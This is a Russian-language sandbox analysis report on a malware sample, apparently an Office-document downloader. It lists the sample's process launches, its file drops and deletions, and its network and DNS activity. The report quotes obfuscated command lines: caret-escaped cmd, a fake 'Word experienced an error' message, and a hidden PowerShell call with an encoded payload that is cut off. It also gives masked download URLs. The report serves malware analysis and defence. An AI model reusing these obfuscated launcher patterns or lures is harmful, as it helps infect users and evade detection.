Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enc IAAgAHMAZQBUAC0ASQBUAEUAbQAgACgAJwBWAEEAUgBpAEEAQgAnACsAJwBMAEUAOgAnACsAJwBVAGUAQgA1AHAAJwApACAAIAAoACAAIABbAFQAeQBQAGUAXQAoACIAewAwAH0AewA0AH0AewA1AH0AewAyAH0AewAxA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\aa7jfxj\pwqr3d0\e40t.dll
Удаляет следующие файлы
- %HOMEPATH%\aa7jfxj\pwqr3d0\e40t.dll
Сетевая активность
Подключается к
- 'ca###os-hub.com':80
- 'de###tas.com':80
- 'mt#######02-site9.gtempurl.com':80
- 'oc####gamers.com':443
- 'ac#####aprogreso.com':80
- 'ne##op.one':443
TCP
Запросы HTTP GET
- http://de###tas.com/n/FUEyoG/
- http://de###tas.com/cgi-sys/suspendedpage.cgi
- http://mt#######02-site9.gtempurl.com/wp-content/E/
- http://ac#####aprogreso.com/cgi-bin/Z5/
Другие
- 'oc####gamers.com':443
UDP
- DNS ASK ya####isayam.com
- DNS ASK ca###os-hub.com
- DNS ASK de###tas.com
- DNS ASK mt#######02-site9.gtempurl.com
- DNS ASK oc####gamers.com
- DNS ASK ac#####aprogreso.com
- DNS ASK ne##op.one
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0ASQBUAEUAbQAgACgAJwBWAEEAUgBpAEEAQgAnACsAJ...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
